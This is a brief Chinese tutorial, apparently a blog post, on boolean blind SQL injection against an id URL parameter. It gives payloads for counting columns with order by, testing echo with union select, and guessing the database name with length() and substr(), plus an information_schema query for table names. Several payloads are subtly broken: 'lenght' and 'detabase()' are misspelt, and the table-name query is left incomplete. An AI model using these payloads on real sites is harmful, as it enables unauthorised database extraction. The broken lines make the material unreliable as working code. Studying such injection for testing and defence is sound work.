sql盲注过程

  • 首先判断注入类型

假设为:url /?id=1

  • 判断字段数

url /?id=1 order by 3

假设在3时页面正常,在4时页面报错,

  • 判断回显

url /?id=1 union select 1,2,3

假设没有回显说明是布尔类型

布尔盲注

  • 首先判断数据库的库名长度,利用length()来获取数据库的库名长度

url /?id=1 and lenght(database())=1 --+

异常就错了,就说明database的字段长度不为1,所以可以从1一直加,加到等于n页面不显示异常为止,就说明database的字段长度就为n

  • 对数据库名进行盲注,利用substr()来获取数据库名

url /?id=1 and substr(detabase(),1,1)='s'

已知有n个字段长度,可以一个一个试出来

  • 对表名进行盲注,利用substr()来获取表名

url /?id=1 and (select table_name from information_schema.tables where table_schema='security' )

  • 对字段进行盲注,获取字段名

  • 利用已知表名,库名,字段名来盲猜表里的值

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值